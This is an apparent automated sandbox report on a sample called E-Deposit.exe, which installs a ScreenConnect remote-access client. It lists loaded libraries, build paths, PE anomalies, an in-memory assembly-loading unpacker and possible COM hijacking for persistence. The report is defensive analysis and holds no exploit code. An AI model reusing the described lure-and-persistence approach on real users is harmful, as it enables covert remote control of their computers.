                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\E-Deposit.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Users\user\Desktop\E-Deposit.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: E-Deposit.exeStatic PE information: certificate valid
                                  Source: E-Deposit.exeStatic file information: File size 5627248 > 1048576
                                  Source: E-Deposit.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: E-Deposit.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Source: E-Deposit.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: E-Deposit.exe
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                                  Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                                  Source: Binary string: \??\C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.pdbl|r source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: E-Deposit.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519460031.0000000002800000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3519662167.0000000002952000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: E-Deposit.exe
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1708388417.0000000000F5D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1692192902.0000000004100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1683493567.000000000426F000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\net20\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: E-Deposit.exe, 59d35d.rbs.2.dr, MSID57F.tmp.2.dr, ScreenConnect.ClientSetup.msi.0.dr, MSID590.tmp.2.dr, 59d35c.msi.2.dr, MSID7B3.tmp.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1683493567.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: E-Deposit.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: E-Deposit.exe, MSICCC5.tmp.1.dr, ScreenConnect.ClientSetup.msi.0.dr, 59d35c.msi.2.dr, 59d35e.msi.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3519084709.00000000027C2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbf source: ScreenConnect.ClientService.exe, 00000007.00000002.3516481860.0000000001408000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3539827027.0000000003117000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.3533129204.0000000012A10000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: E-Deposit.exe
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: E-Deposit.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                  Data Obfuscation

                                  barindex
                                  .NET source code contains potential unpacker
                                  Source: 0.2.E-Deposit.exe.3370000.0.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: 0.0.E-Deposit.exe.10178ec.5.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                                  Source: ScreenConnect.Client.dll.2.drStatic PE information: 0x94F102E7 [Mon Mar 8 13:28:07 2049 UTC]
                                  Source: MSICCC5.tmp.1.drStatic PE information: real checksum: 0x2f213 should be: 0x1125d0
                                  Source: E-Deposit.exeStatic PE information: real checksum: 0x54d1c1 should be: 0x55f625
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_01784BE0 pushfd ; ret 0_2_01784BEA
                                  Source: C:\Users\user\Desktop\E-Deposit.exeCode function: 0_2_017870BB push eax; mov dword ptr [esp], ecx0_2_017870C1
                                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_3_043B8462 push es; ret 4_3_043B8470
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeCode function: 7_2_05CBBAE0 push esp; iretd 7_2_05CBBAE1
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6322ED push ebx; retf 8_2_00007FFD9B6322FA
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6309D8 push ebx; retf 8_2_00007FFD9B63098A
                                  Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B63096D push ebx; retf 8_2_00007FFD9B63098A

                                  Persistence and Installation Behavior

                                  barindex
                                  Possible COM Object hijacking
                                  Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\ScreenConnect.Windows.dllJump to dropped file
